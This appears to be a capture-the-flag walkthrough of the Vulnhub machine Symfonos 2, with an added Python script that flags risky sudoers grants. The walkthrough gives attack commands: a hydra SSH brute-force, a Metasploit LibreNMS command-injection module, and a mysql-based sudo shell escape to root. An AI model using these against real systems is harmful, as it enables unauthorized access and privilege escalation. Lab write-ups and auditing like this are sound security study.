Vulnhub – Symfonos 2 Walkthrough

We start by scanning the target with nmap -A -T4 -p- -vv

We list the SMB shares with smbclient -L \\\\ and then connect to the anonymous share with smbclient \\\\\\anonymous and download the file log.txt

OK, from the log file we get a username, aeolus:

We can use hydra to brute-force SSH after confirming that the user aeolus has SSH access:

hydra -l aeolus -P /root/pass/rockyou.txt ssh:// -f -vV

Now we log in over SSH using the password sergioteamo:

Using a script we can see that MySQL is running on port 3306, so let's explore it more:

Now we find a file named librenms in the Apache directory, where we can see that a service is running on port 8080:

Now we can open a tunnel to port 8080 using SSH tunneling, like ssh -L 8080: aeolus@, with the same password for the user aeolus as before. We log in again, but this time there is a tunnel to port 8080

Now we browse to localhost:8080 and find a new service, LibreNMS. Searching for it with searchsploit turns up a Metasploit exploit for it, so let's start Metasploit:

In metasploit use exploit/linux/http/librenms_addhost_cmd_inject

OK, this time we got in as the user cronus, and this user has sudo privileges:

OK, the command will be sudo -u root /usr/bin/mysql mysql -e '\! /bin/sh'
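
An added example, not part of the original walkthrough: a simplified audit of sudoers text that flags root grants on programs able to start a shell, which is what makes the mysql grant above a path to root. The sample sudoers content is constructed, the program set beyond mysql is an assumption of well-known cases, and aliases and #uid entries are not handled.

```python
import os
import re

# Programs that can start a shell from inside themselves. Only mysql (client
# command \!) is from the walkthrough; the rest are added and not exhaustive.
SHELL_CAPABLE = {"mysql", "vi", "vim", "less", "more", "man", "find", "awk", "gdb"}
SPEC = re.compile(r"^(\S+)\s+[^=]+=\s*(.+)$")   # who  hosts = commands
RUNAS = re.compile(r"^\(([^)]*)\)\s*")           # (root), (ALL : ALL)
TAGS = re.compile(r"^(?:[A-Z_]+:\s*)+")          # NOPASSWD:, SETENV:, ...
SKIP = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")

# Constructed sample; the walkthrough does not show the real sudoers file.
SAMPLE = r"""
Defaults env_reset
cronus ALL=(root) NOPASSWD: /usr/bin/mysql
backup ALL=(root) /sbin/reboot, \
                  /usr/bin/find
www    ALL=(www-data) /usr/bin/less
"""

def audit_sudoers(text):
    """Return (who, runas, program, nopasswd) for each risky grant."""
    findings = []
    text = text.replace("\\\n", "")              # join continued lines
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and #include
        m = SPEC.match(line)
        if not m or line.startswith(SKIP):
            continue
        who, rest = m.groups()
        runas, nopasswd = "root", False          # sudo's default run-as user
        for cmd in re.split(r",\s*(?![^()]*\))", rest):  # commas outside (...)
            cmd = cmd.strip()
            r = RUNAS.match(cmd)
            if r:                                # run-as carries to later commands
                runas, cmd = r.group(1), cmd[r.end():]
            t = TAGS.match(cmd)
            if t:                                # tags carry over as well
                nopasswd = nopasswd or "NOPASSWD:" in t.group(0)
                cmd = cmd[t.end():]
            targets = re.split(r"[,:\s]+", runas.strip())
            as_root = ("root" in targets or "ALL" in targets) and "!root" not in targets
            prog = (cmd.split() or [""])[0]
            risky = prog == "ALL" or os.path.basename(prog) in SHELL_CAPABLE
            if as_root and risky and not prog.startswith("!"):
                findings.append((who, runas, prog, nopasswd))
    return findings

if __name__ == "__main__":
    print(audit_sudoers(SAMPLE))
```

Each finding is a grant to review: remove it, or replace it with a wrapper that runs one fixed, non-interactive task.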
